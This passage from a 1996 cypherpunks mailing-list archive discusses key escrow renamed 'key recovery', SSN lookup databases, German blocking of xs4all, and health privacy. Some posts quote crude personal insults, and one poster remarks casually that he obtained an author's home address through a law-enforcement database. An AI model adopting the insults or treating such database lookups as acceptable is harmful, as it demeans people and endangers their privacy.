overall health care services. Some of this is due to the rapid availability of higher cost/experimental services. Some of this is due to the higher cost of the administrative bureaucracy. Due to the large difference in total costs, I do not think that travel in either direction significantly affects this number. Ciao, James Check out www.spinex.com for more effective alternatives to MRI for diagnosing spinal function at 1/20th of the cost. P.S. No, Canada is not perfect, and I don't know everything.
From sandfort at crl.com Wed Sep 18 14:02:50 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 19 Sep 1996 05:02:50 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Like Tim, I'm a little surprised at all the stupid name calling on the list lately. On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > I don't think Timmy believes his own lies. Again, I don't believe Tim lies, the good doctor's assertions to the contrary not withstanding. > Is Timmy gay? You should have seen the babe Tim was with at my party. Where do folks come up with this nonsense? > Timmy is known as a nutcase and a liar - if he keeps up his > "character assassination" attacks, the only reputation he hurts > is his own. Yeah, that's the way reputation works, but the gun is definitely pointed in the other direction. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From f_estema at alcor.concordia.ca Wed Sep 18 14:03:05 1996 From: f_estema at alcor.concordia.ca (f_estema at alcor.concordia.ca) Date: Thu, 19 Sep 1996 05:03:05 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example :) In-Reply-To: <2.2.32.19960918083303.00750b3c@healey.com.au> Message-ID: On Wed, 18 Sep 1996, Benjamin Grosman wrote on coderpunks: > Hey there...thought I'd drop this in to you... > someone I know is in the process of being set upon by a shamster (well, ^^^^^^^^ Shamster: SHA-enabled biocomputing hamster. Distantly related to Shneier's DESosaurus. Cute, cuddly and mathematically secure and authentic. I leave to the imagination its input and output processes. Eats snake oil for lunch. From tcmay at got.net Wed Sep 18 14:06:09 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 05:06:09 +0800 Subject: The GAK Momentum is Building... 
Message-ID: At 12:49 PM 9/18/96, Declan McCullagh wrote: >On Tue, 17 Sep 1996, Timothy C. May wrote: >> >> (BTW, I predict that the tainted term "key escrow" is now gone from the >> official lexicon. I haven't seen the Clipper IV proposal, but I surmise >> that the baggage the term "key escrow" carries means that some more >> benign-sounding term will be used in the final proposal. Something like >> "Key Recovery System." You heard it here.) > >I agree, of course. But Gore's office has been telling me about the "Key >Recovery System" for months. It's nothing new in the DC cryptolexicon. Yeah, I shouldn't have added the "You heard it here" line, implying I had invented the term. As others have noted, this seems to be the new term for key escrow. The brainwashing must've taken hold on me, and as a good citizen-unit I had absorbed the message: "Key Recovery is Security, Ignorance is Strength." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From attila at primenet.com Wed Sep 18 14:37:41 1996 From: attila at primenet.com (attila) Date: Thu, 19 Sep 1996 05:37:41 +0800 Subject: Nobody@replay: childish foul [WAS: A daily warning regarding Timothy May] In-Reply-To: <199609180341.FAA02454@basement.replay.com> Message-ID: <199609181456.IAA16990@InfoWest.COM> In <199609180341.FAA02454 at basement.replay.com>, on 09/18/96 at 05:41 AM, nobody at replay.com (Anonymous) said: = .Timothy C. May is a lying sack of shit. OK, children, particularly nobody at replay.com --this is going too far. 
THERE IS NO EXCUSE FOR DIRECT ATTACKS ON TCMAY OR ANYONE ELSE. We all pick on someone occasionally, which is acceptable, but "A daily warning regarding Timothy May" as above will (or already is) the death knell of cypherpunks. if you are going to be that personal, drop your immature mask, attend a SF cypherpunks meeting, find Tim and tell him to his face: "Timothy C. May is a lying sack of shit," try to punch Tim in the nose before he punches you, and let the chips fall where they fall. At least you will be a man, not "A lying sack of coward." I don't always agree with Tim, but Tim makes me think about it. Cypherpunks was supposedly founded to promulgate _discussion_ of cryptography and related issues of Bill of Rights as it pertains to cryptographical freedom, and the freedom of speech. this list is a political free-for-all; it can be rough around the edges with individual egos and sarcasm, but there is no justification for direct attacks without provocation or reason. nobody at replay has contributed to the list; but if the contributions are to be vitriolic and childish attacks, /dev/null awaits with open arms.
From jt at freenix.fr Wed Sep 18 14:42:39 1996 From: jt at freenix.fr (Jerome Thorel) Date: Thu, 19 Sep 1996 05:42:39 +0800 Subject: Cryptology: International conference - 25 SEPT - Paris Message-ID: (message sent to interesting persons - bcc: field) Conference The Public Voice and the Development of International Encryption Policy Sponsored by Electronic Privacy Information Center Global Internet Liberty Campaign Internet Privacy Coalition Open Society Institute - Soros Foundation Planete Internet September 25, 1996 Centre de Conférence Internationale 19 Avenue Kleber, Paris 16, France Program, registration and further information (English): http://www.epic.org/events/crypto_paris Or (French) http://www.netpress.fr/crypto PARIS, September 16 - The international development of the Internet leads governments, users organisations and corporations to find a compromise for the use and disposal of encryption, which allows to keep the secrecy of digital communications. Governments want to keep the possibility to intervene on communications in order to fight computer crime. The industry (private companies) search a way to keep an eye on their communications' integrity not to erode their competitivity. And privacy organisations want to preserve citizens' privacy and freedom of speech in expression networks such as the Internet. Before a meeting of governmental experts (under the auspices of the OECD Sept 26, 27 in Paris), the Electronic Privacy Information Center, a Washington, DC-based organisation, asked scientists, international right jurists and associations to meet on September 25 for a conference. The conference will stress legal aspects of computer-based secrecy, based on propositions made by some countries to create a regime of "encryption under conditions" (encryption under control), on the Trusted Third Party Services (TTP) scheme.
Companies that will keep encryption keys of corporations and individuals would have to keep them at disposition of law enforcement authorities. Who will play this TTP role? Which guarantee for end users? EPIC asked the world's most valuable experts to answer these questions. PROGRAM SUMMARY find the whole and last one at http://www.epic.org/events/crypto_paris/schedule.html Cryptographers: Zimmermann (PGP Inc), Diffie (Sun, pub-key system inventor), Anderson (Cambridge U., UK), Blaze (Bell Lab), etc. Scientists and experts: Horibe (Hitotsubashi U.), Carpenter (IAB), Simons (ACM), etc. Privacy advocates from EPIC (Rotenberg, Banisar), ACLU (Steinhardt), Privacy International (Davies), and French League for Human Rights. Officials and/or governmental experts from : OECE crypto & security ad hoc commissions, Attorney General Dept and High Court (Australia), Economic Ministry (Germany), Austrian Law Institute, etc. CONTACTS FOR INFO & REGISTRATIONS • USA: EPIC: Mark Rotenberg , Dave Banisar . 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544 9240 (tel), +1 202 547 5482 (fax) • FRANCE Planete Internet (Net Press), Paris: Xavier Cany , Jerome Thorel . 191 Av. Aristide Briand, F-94230 Cachan. +33 1 49 08 58 33 (tel), +33 1 49 08 58 31 (fax). Jerome Thorel * Planete Internet Journaliste / ID#72052 * Editor / Redak chef 191 Av. A. Briand * Tel : (331) 49085830 94230 CACHAN * web : www.netpress.fr From byrd at acm.org Wed Sep 18 14:46:52 1996 From: byrd at acm.org (Jim Byrd) Date: Thu, 19 Sep 1996 05:46:52 +0800 Subject: SSN database scam? Message-ID: <2.2.32.19960918141242.006e9b48@super.zippo.com> At 01:22 PM 9/18/96 +0200, Gary Howland forwarded: >Forwarded from www-security mailing list. [snip] >Can anybody comment on the item forwarded below my sig file? It claims >there's a database w/ people's credit card no's etc on it and you have to >give your name and social security number to get off of it.
This strikes >me as being a scam to get your ssn, but this went around at work and >people are actually calling and giving it out. I know ssn's aren't really >as secure as they're supposed to be, but still... I happen to work for Lexis-Nexis, but I don't speak for the company. Yes, P-Trak is real, it was recently made available to our customers. It is NOT a scam to get SSNs. Lexis-Nexis is a large and reputable company, best-known for its huge legal database system, Lexis. The Nexis side has news reports from a large variety of sources. P-Trak originally made SSNs available, but Lexis-Nexis removed this feature in response to protests. From bmcarpenter at trevecca.edu Wed Sep 18 15:03:56 1996 From: bmcarpenter at trevecca.edu (Myers W. Carpenter) Date: Thu, 19 Sep 1996 06:03:56 +0800 Subject: Macintosh Mixmaster port... Who's doing it? Message-ID: Does anyone have any idea who might be attempting a Macintosh Mixmaster port? I and some other people were eyeing the idea. If you know who might be doing this port I would appreciate hearing from them. Thanks. myers From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 18 15:03:56 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 19 Sep 1996 06:03:56 +0800 Subject: The Near-Necessity of Health Insurance Message-ID: <01I9MKL4PCX48Y4YUZ@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 18-SEP-1996 02:54:27.36 >Personally, I have not been a patient in a hospital in my entire adult >life. Nor have I seen a doctor, except for a mandatory college physical in >1970 and an insurance company physical in 1977. I just haven't broken any >bones, had any serious illnesses, or felt the need to visit a doctor, an >emergency room, or a walk-in clinic of any sort. I suppose I've been lucky. >Also, I dislike hospitals and avoid doctors unless there seems to be a >compelling need. So far, there has not been. 
While this is certainly your business, I would suggest at least one physical a year, including blood work, as a good preventative measure... I believe it _has_ been shown to extend lives; I can do a Medline lookup if desired. >In other words, the person who insures himself (through savings and >investments) and who offers to pay for treatment out of his own funds, may >be at a serious disadvantage. He pays the inflated rates for services, and >may face delays in being admitted to a hospital. [...] >(Obviously the folks who use their insurance routinely, as one of my >engineers once used to do (he'd take his kids to the hospital every time >they sneezed), are being subsidized by those of us who avoid hospitals at >all costs.) Actually, the major subsidy appears to be that employer-paid health insurance isn't a taxable benefit. The status regarding self-insured persons such as you is constantly changing, but they're looking at subsidizing that also. Essentially, taxes paid by those with low or no employer-paid health insurance are subsidizing those with high-cost employer-paid health insurance. -Allen From Adamsc at io-online.com Wed Sep 18 15:08:25 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 06:08:25 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] Message-ID: <19960918180841187.AAA221@IO-ONLINE.COM> On Tue, 17 Sep 1996 17:14:53 -0400, Mike Fletcher wrote: >>>Gee, biotech has come a long way. Now I can download the Anthrax DNA >>>sequence from the net and insert it in some carrier bacteria and start >>>making Anthrax bacteria. Neat! >> Now the bad news: the DNA replicator only works under Windows 95 and comes >> with buggy drivers! > Buggy drivers? But isn't that the point in this case? :) True, true... And you *really* don't want to see what happens when it crashes! >> Unfortunately, it can be very deadly. The idea here is that it rarely infects
>> humans - in the normal course of events. If a determined biowarrior is trying >> to infect people, all bets are off. > > The Frank Herbert (of _Dune_ fame) book _White Plague_ comes >to mind. Basically a molecular biologist's wife and kids are killed >by an IRA bomb while visiting Dublin. He snaps and creates a plague >which kills women (men are carriers) as revenge. All without using >that nasty Internet (in fact, the book was written back before even >ARPAnet). I remember reading this one. Very applicable! # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From droelke at rdxsunhost.aud.alcatel.com Wed Sep 18 15:11:58 1996 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Thu, 19 Sep 1996 06:11:58 +0800 Subject: Snake-Oil FAQ Message-ID: <9609181827.AA20470@spirit.aud.alcatel.com> Dale Thorn wrote: > > Krenn wrote: > > It would be nice to have a list of actual products which are deemed > > potential snake-oil. Such a list could be maintained anonymously > > through a nym to avoid all the annoying legal problems with commenting > > on another's product. Though truth is the best defense against libel > > charges, it would be very annoying to be sued or some such by some > > hairbrained snake-oil peddler. > > Think how much more annoying it would be if the shoe were on the other > foot. > Libel/Slander is very different from doing a review. Unfortunately, in today's legal climate, it is way too easy to find a lawyer that will harass someone for a negative review. Unless you are prepared to fight such a legal battle, it is much easier to do anonymous reviews, and build up a reputation as a good reviewer through use of signatures, etc.
If you have a good product, and get negative reviews, the truth will come out eventually through other channels. Either the product really isn't good, or the reviewer loses his reputation and his messages descend into the noise. Thats life - deal with it! Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From byrd at ACM.ORG Wed Sep 18 15:14:11 1996 From: byrd at ACM.ORG (Jim Byrd) Date: Thu, 19 Sep 1996 06:14:11 +0800 Subject: SSN database scam? Message-ID: <2.2.32.19960918181651.00706174@super.zippo.com> One thing people forget is that Lexis-Nexis is hardly the first company to offer this kind of service. Several years ago, there was a controversy when Lotus planned to offer this kind of information on CD-ROM. The main competition of Lexis-Nexis, West Publishing Company ("Westlaw"), offered this kind of service before Lexis did. The last I heard, it was possible to get SSNs via Westlaw. I don't know if this is still true. I checked with a friend of mine, and got this response: "Westlaw offers access to several databases (including its PEOPLE-CB and INFOAM databases). They provide a person's "Credit Bureau Header," which contains social security number, previous address(s), telephone number(s), spouse name, date of birth, related names/aliases, and the date the report was filed." I happen to work for Lexis-Nexis, but I don't speak for the company. I work in a very different part of the company, and don't know the people involved with P-Trak. From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 18 15:19:38 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 19 Sep 1996 06:19:38 +0800 Subject: Edited Edupage, 17 Sept 1996 Message-ID: <01I9MKS1EDY68Y4YUZ@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 18-SEP-1996 05:39:23.00 >************************************************************ >Edupage, 17 September 1996. 
Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ >THE BOTTOM LINE ON ELECTRONIC LIBRARIES >A former Public Library Association official estimates the cost of wiring >the nation's libraries at somewhere between $2- and $3-billion -- "a sum >nearly equivalent to that spent by the philanthropist Andrew Carnegie during >the great spurt of library building," notes journalist Nicholas von Hoffman. >But, "being able to afford the hardware is one thing," says a senior VP of >New York Public Library's Research Libraries. "Being able to replace it >year after year and being able to afford the staff to help people use it is >another. We could put workstations everywhere, but we don't have enough >staff. The equipment is on a three-year, six-thousand-dollar replacement >cycle. If people are using things like the World Wide Web, we need one >staff member out on the floor for every 20 workstations in use... Right now >we have 250 workstations for the public, so one staff member for every 20 >workstations becomes a major investment." (Architectural Digest Oct 96 p130) I would suspect that one of the following will take place: A. Libraries will not wind up getting Internet access subsidized to any great extent, since they can't afford to pay for the rest of it. B. Libraries will get Internet access subsidized, but won't be able to use it a lot so the subsidy may eventually go by the wayside due to lack of political support. C. Libraries will get everything subsidized. -Allen >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. 
>************************************************************ >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >John McCarthy (if your name is John McCarthy; otherwise, substitute your >own name). ... To cancel, send a message to: listproc at educom.unc.edu with >the message: unsubscribe edupage. (If you have subscription problems, send >mail to manager at educom.unc.edu.) From jlv at signet.sig.bsh.com Wed Sep 18 15:26:52 1996 From: jlv at signet.sig.bsh.com (Jason Vagner) Date: Thu, 19 Sep 1996 06:26:52 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Timothy C. May wrote: > > I've been thinking a lot about the prospects of a "wealth tax," or "asset > tax," in the U.S. With the stock market averages at record levels (and, > hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level), > and with increasing fractions of people's overall net worth tied up in > equities, bonds, houses, property, etc., it may be that the looters will > take a more serious look at taxing people's overall wealth, e.g., the 5% of > net worth per year that some countries have. Forgive me if this is a stupid question, but could this lead to "engineering" the market at particularly times of the year to decrease the "official" value of an entity's value and complicating the pricing of equities? Would this become a viable means for those with less wealth to capitalize on the momentary "dip" in prices? 
jlv From ericm at lne.com Wed Sep 18 15:41:34 1996 From: ericm at lne.com (Eric Murray) Date: Thu, 19 Sep 1996 06:41:34 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: <199609181415.AA21481@crl11.crl.com> Message-ID: <199609181553.IAA28096@slack.lne.com> Troy Varange writes: > > > tcmay at got.net (Timmy May) (fart) writes: > > > * Detweiler (vznuri at netcom.com) writes: [spew from "Dr.Dimitri Vulis" deleted] > Fuckhead. If you think someone's a fuckhead, please just put them in your KILL file and get on with your life. You don't need to announce your discovery to the rest of the group- we either agree with you (and have killfiled the fuckhead) or we don't agree that he's a fuckhead. Your announcement will sway no one's opinion. All it does is add to the noise. Thanks. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From perry at piermont.com Wed Sep 18 15:44:01 1996 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 19 Sep 1996 06:44:01 +0800 Subject: XPA_nix In-Reply-To: Message-ID: <199609181622.MAA14053@jekyll.piermont.com> "" writes: > > On Thu, 12 Sep 1996, John Young wrote: > > > Cheswick opines,"This is the first major attack of a kind that I believe to > > be the final Internet security problem." > > Harrumph. We should only BE so lucky. I don't remember if Ches was quoted correctly, but it's more or less true -- we know how to deal with most classes of major problems, but denial of service is still a major question mark. I suspect it's the last big frontier.
Perry From unicorn at schloss.li Wed Sep 18 15:47:43 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 06:47:43 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <199609181446.HAA10952@netcom8.netcom.com> Message-ID: On Wed, 18 Sep 1996, Bill Frantz wrote: > At 1:21 AM 9/18/96 -0400, Black Unicorn wrote: > >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: > >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA > >> >sequence from the net and insert it in some carrier bacteria and start > >> >making Anthrax bacteria. Neat! > > > >Culturing and growing anthrax is painfully simple. No DNA required. > > Sorry Unicorn, you missed my point. (1) You need DNA to grow bacteria. > You can get the DNA two ways. (A) You get a sample of the beast, or (B) > You get a DNA sequence and then regenerate the DNA. (I don't think B is > technically feasable yet.) (2) You can't send samples of the beast thru > the net. I think your point was that the net was not responsible for the proliferation of Anthrax development data. (Am I wrong?) My point was that in the eyes of the "leaders" all that is required to make the net responsible for the proliferation is for the process to be describeable in a simple one or two page set of instructions (such as Anthrax is). > ------------------------------------------------------------------------- > Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting > (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. 
> frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From alexlh at yourchoice.nl Wed Sep 18 16:08:47 1996 From: alexlh at yourchoice.nl (Alex Le Heux) Date: Thu, 19 Sep 1996 07:08:47 +0800 Subject: (fwd) Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITE Message-ID: <199609181746.TAA13590@sarah> Path: xs4all!felipe From: felipe at xs4all.nl () Newsgroups: xs4all.announce Subject: Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITE Date: 18 Sep 1996 17:28:31 GMT Organization: XS4ALL, networking for the masses Lines: 118 Approved: the boss Message-ID: <51pbfv$anu at news.xs4all.nl> NNTP-Posting-Host: xs1.xs4all.nl X-XS4ALL-Date: Wed, 18 Sep 1996 19:28:31 MET DST X-Newsreader: NN version 6.5.0 #4 *** GLOBAL ALERT *** FOR IMMEDIATE RELEASE SEPT. 18, 1996 - Please redistribute this document widely with this banner intact - Redistribute only in appropriate places & only until 15 October 1996 GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES. At the behest of, and in response to legal threats from, the German government, internet providers in Germany have blocked the Dutch Web site Access For All (www.xs4all.nl), removing German users' access to the entire xs4all system. The German government demanded this action because xs4all hosts a Web "home page" with so-called left-wing political content that, though fully legal in the Netherlands, is allegedly illegal in Germany. (see: http://www.anwalt.de/ictf/p960901e.htm). As a result of this action, *all* xs4all web sites, including several thousand that have nothing to do with the offending home page, are unavailable to readers in Germany. Please send a letter of protest to the German ambassador in your country, ask your foreign minister to protest officially to the German government, and distribute this alert as widely as possible online and to the press. 
Referring to article 19(2) of the International Covenant on Civil and Political rights, which Germany ratified in 1973, we, the undersigned organizations, consider this censorship an illegal act. Additionally, the value of attempting to ban content the German government finds offensive is highly questionable. The proper response to offensive expression is more and better expression, and prosecution of offending criminals, not censorship. As a result of the overly broad censorship measure which targets an entire Internet access provider instead of a specific user, all 3000 and more Web sites hosted by xs4all are virtually inaccessible in Germany. The loss of clients who market in Germany has resulted in economic damage to xs4all. The immeasurable harm of censoring thousands of other users for the speech of one is even greater. Access for All, though it has expressed willingness to assist the Dutch police in identifying online criminals abusing the xs4all system, has a policy against censoring its clients. Mirroring this position, at least one German Net provider has responded to the government demands with skepticism, pointing out that their compliance with the censorship request may cause them to violate contracts with their own German users, and that the government's liability threats are tantamount to holding a phone company liable for what users say on the telephone. Instead of the futile act of censorship that has simply drawn increased attention to the offending material and resulted in its widespread availability on other sites throughout the world, the German government should have acted through legal channels and asked the authorities in the Netherlands to cooperate in determining what legal action, if any, was appropriate. We are concerned that German internet providers have cooperated so easily with government censorship efforts. 
Some level of cooperation was probably assured by underhanded and rather questionable police threats of system operator liability for user content, but we must urge more resistance on the part of Net access providers to such online censorship schemes. As with libraries, there are many who would censor, but there is a responsibility on the part of providers of access to information, to work to protect that access, else libraries, and Internet service providers, lose the reason for their existence. We ask that the German government refrain from further restrictive measures and intimidation of internet providers and recognize the free, democratic, world wide communications represented by the Internet. All governments should recognize that the Internet is not a local, or even national, medium, but a global medium in which regional laws have little useful effect. "Top-down" censorship efforts not only fail to prevent the distribution of material to users in the local jurisdiction (material attacked in this manner can simply be relocated to any other country), but constitute a direct assault on the rights and other interests of Internet users and service providers in other jurisdictions, not subject to the censorship law in question. 
For press contacts, and for more information about the Internet, see the homepages for the signatories to this message: DB-NL (Digital Citizens Foundation in the Netherlands) * http://www.xs4all.nl/~db.nl ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei CITADEL-E F France *http://www.imaginet.fr/~mose/citadel CommUnity (UK) * http://www.community.org.uk Electronic Frontier Canada * http://www.efc.ca/ Electronic Frontier Foundation (USA) * http://www.eff.org Electronic Frontiers Australia * http://www.efa.org.au/ Other signatures: NLIP, Dutch Foundation for Internet Providers * http://www.nlip.nl Internet Providers Rotterdam * http://www.ipr.nl Digitaal Werknet Nederland * http://www.dwn.nl Foebud e.V, foundation to promote free datatraffic, * http://www.zerberus.de National Writers Union (UAW LOCAL 1981 AFL-CIO) * http://www.nwu.org/nwu/ Nizkor Project * http://www.nizkor.org/ Internet Access Foundation (NL) * http://www.iaf.nl/ Digitale Stad Venlo * http://www.dsvenlo.nl CSO * http://www.canucksoup.net/ -- Felipe Rodriquez - XS4ALL Internet - finger felipe at xs4all.nl for http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 pgp Key fingerprint = 32 36 C3 D9 02 42 79 C6 D1 9F 63 EB A7 30 8B 1A -- /// I dabble in techno-house and sometimes, /// I do that badass hip-hop thang... /// But the F U N K gets me every time! From thumbnail at nym.alias.net Wed Sep 18 16:37:55 1996 From: thumbnail at nym.alias.net (Thumbnail) Date: Thu, 19 Sep 1996 07:37:55 +0800 Subject: FCC Licensed Cypherpunks Message-ID: <199609181800.OAA21782@anon.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- As someone pointed out recently, there's a lot of similarity between the as-yet-unregulated Internet and the pre-FCC airwaves. There were even cypherpunk-analogs back then, who called themselves amateur radio operators. Where are they now? Corralled into tiny slices of FCC-approved bandwidth. 
Granted titles of nobility by the government in recognition of their Morse code prowess. Eager to report pirate operators who don't play by the rules, at least back when the FCC still investigated such complaints. There lies the future: all those newbies wandering in with their "Unbrakable Random Number Generator Encription Systemz" are going to come back as Master Class Amateur Cryptography Operators, and by God you'd better not laugh at their Internet Key Recovery Authority certificates, if you know what's good for you. Have a nice day. - --Thumbnail ~~~ The PGP signature on this message is to certify that it was sent by thumbnail at nym.alias.net on or before Wed Sep 18 18:00:48 1996 GMT. The administrators of nym.alias.net and the nym.alias.net PGP key in no way endorse, approve of, or claim authorship of this message. Report any abuse of this pseudonym service to admin at nym.alias.net. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From liberty at gate.net Wed Sep 18 16:47:27 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 19 Sep 1996 07:47:27 +0800 Subject: The GAK Momentum is Building... Message-ID: <199609181600.MAA109012@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: shamrock at netcom.com, liberty at gate.net, cypherpunks at toad.com Date: Wed Sep 18 11:57:32 1996 Lucky wrote: > On Wed, 18 Sep 1996, Jim Ray wrote: [my stuff about a small "victory" elided.] > Nope. It is a Cypherpunk loss. 
The use of the term "key recovery" for GAK > now fully obfuscates the distinction between accessing a > backup copy by the legitimate owner (or his estate, employer, etc.) and > GAK. Many PKIs will support the former type of key recovery. And for good > reasons. Thanks to the brainwashers using the same term for GAK, it will > now become impossible to tell from a basic description of a PKI if it > supports GAK or not. Furthermore, those who oppose the latter type of key > recovery (us!), will be pushed further into the fringe by the media > now being able to mix up our arguments against GAK with arguing against > true key recovery. [Do you notice the weird constructs I have to use to > distinguish the two meanings? One of them being new...] Upon further reflection, I agree with Lucky. I will say that the _really_ bad news is that our opponents seem to be getting smarter. Or else I'm just getting dumber. :( Also: If any more of you have comments for Judge Kozinski, please send them to me soon. Comments from stable nyms (such as you, Lucky) are especially appreciated, and with your permission I will include this message. Please tell me if you want me to include your e-mail address in the message to Judge Kozinski. TIA. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. 
http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From tcmay at got.net Wed Sep 18 16:53:28 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 07:53:28 +0800 Subject: GAK, GAP, GAY Message-ID: GAK -- Government Access to Keys GAP -- Government Access to Patients GAY -- Government Access to You At 3:03 PM 9/18/96, Lucky Green wrote: >On Wed, 18 Sep 1996, Jim Ray wrote: >> I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as >> "GAK," is a step on the path to honesty WRT the English language, though >> it's important to continually point out, as Tim did in his post, that >> *access* -- rather than just recovery -- is obviously what Mr. Freeh wants. >> >> I'd count this likely change in terminology as a "cypherpunk victory," >> albeit a very small and certainly a very hard-fought one. > >Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK >now fully obfuscates the distinction between accessing a >backup copy by the legitimate owner (or his estate, employer, etc.) and >GAK. Many PKIs will support the former type of key recovery. And for good >reasons. Thanks to the brainwashers using the same term for GAK, it will >now become impossible to tell from a basic description of a PKI if it >supports GAK or not. Furthermore, those who oppose the latter type of key Further, merely _asking_ your Designated Key Recovery Authority what its release policies are will of course place your name on the SPL (Suspicious Persons List). The FAA is an agency which will have nearly unlimited access to communications, under the Safe Skies and Anti-Child-Hurting Act. 
(Think about it--Clinton already signed a couple of Presidential Decision Directives and Congress passed various anti-terrorism acts which already give the Feds authority to wiretap and surveil more widely than before, at least legally. The Foreign Intelligence Surveillance Act (or court) allows widespread surveillance of suspected foreign agents, without any notification of local courts or of the surveillance target. Won't these many provisions allowing wide surveillance already be used almost instantaneously to force PKIs to disclose keys of all those on the SPL? "If it saves just one child.") On a related note, I read an article yesterday about the proposed new Health Data Base, with all encounters with any medical institution or any health care provider of any sort being cross-linked and cross-referenced. The privacy concerns are supposedly handled by having "security tickets" for various hospital officials, researchers (!!), insurance companies, and law enforcement. (I put the "!!" next to the "researchers" because I don't recall releasing my medical and dietary history to any so-called "researchers." While I have no doubt that many "data miners" would like access to such national data bases, and that some potentially valuable information could be gleaned, I didn't release this information for Joe Gradstudent, Ph.D. candidate to sift through.) [Here are some more details: "Mission: one-stop medical records," Robert S. Boyd, San Jose Mercury News, 1996-09-17, p. 1. 
"Virtually unnoticed by the public, health-care experts are preparing to create an electronic "Master Patient Index," covering every American's medical records from cradle to grave...."We can't eliminate privacy concerns, but we can minimize them," said Richard Rubin, president of the Foundation for Health Care Quality in Seattle at a planning conference here last week....David Kilman, a computer expert at New Mexico's Los Alamos National Laboratory, where the idea for the master index was born....Only people with a 'security ticket'--such as doctors, insurers, scientific researchers or police with a proper warrant--are supposed to be able to see the clinical details....Kathy Ganz, director of the New Mexico Health Policy Commission, said, "Rights to privacy are genuine concerns, but they will need to be balanced against notions of common good.""] Pretty chilling, eh? As we all know, once such medical, dietary, and genetic data bases are established, the likelihood of privacy-invading use is near unity. If the NLETS data base can be routinely accessed (it's how I got Thomas Pynchon's home address, but that's another story), imagine who will hack this data base! The tabloids will love it, as they gain access to "medical records of the stars." Hackers will suck down as much as they can and then sell the records. And such data bases will be tied to True Names, of course, thus allowing the "freezing out" of anyone who 